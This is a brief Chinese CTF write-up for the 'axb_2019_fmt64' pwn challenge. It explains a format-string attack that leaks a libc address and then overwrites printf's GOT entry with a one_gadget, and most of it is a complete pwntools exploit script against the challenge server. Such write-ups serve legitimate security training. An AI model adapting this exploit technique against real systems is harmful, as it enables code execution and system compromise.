典型的fmt,checksec检查后,只有NX保护,所以直接hook got表就完事了,不过这里我就郁闷了 不准我通过printf函数,leak libc????
思路
- 先用fmt leak libc,再用one_gadget hook掉got表中的函数,我这里hook的是printf函数
exp
from pwn import * #offset 8 arg #p=process('./axb_2019_fmt64') p=remote('node3.buuoj.cn',28024) elf=ELF('./axb_2019_fmt64') #p=gdb.debug('./axb_2019_fmt64','b printf') libc=ELF('../libc-2.23.so') one_gadgets = [0x45216,0x4526a,0xf02a4,0xf1147] #leak libc p.recvuntil("Please tell me:") p.sendline(b'%9$spppp'+p64(elf.got['sprintf'])) sprintf=u64(p.recvuntil('x7f')[-6:].ljust(8,b'x00')) libc.address=sprintf-libc.symbols['sprintf'] one_gadget=libc.address+one_gadgets[0] #hook got's sprintf p1=one_gadget&0xffff p2=(one_gadget>>16)&0xffff payload=b'%'+bytes(str(p1-9),encoding='utf-8')+b'c%12$hn' payload+=b'%'+bytes(str(p2-p1),encoding='utf-8')+b'c%13$hn' payload=payload.ljust(0x20,b'x00') payload+=p64(elf.got['printf'])+p64(elf.got['printf']+2) p.sendline(payload) #gdb.attach(p) p.interactive() print(hex(one_gadget)) print(payload)